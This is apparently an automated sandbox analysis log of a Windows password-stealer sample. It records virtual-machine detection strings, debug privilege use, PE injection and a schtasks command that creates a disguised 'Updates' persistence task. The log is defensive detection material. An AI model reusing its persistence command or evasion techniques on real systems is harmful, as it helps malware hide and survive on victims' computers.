Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96023	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 95738	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 95623	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 95416	Jump to behavior

Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: IwUNvHNy.exe, 0000000E.00000002.522868815.0000000001504000.00000004.00000020.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000003.478235783.00000000014EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Code function: 10_2_06955780 LdrInitializeThunk,

10_2_06955780

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Memory written: C:\Users\user\AppData\Roaming\IwUNvHNy.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe {path}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe {path}	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
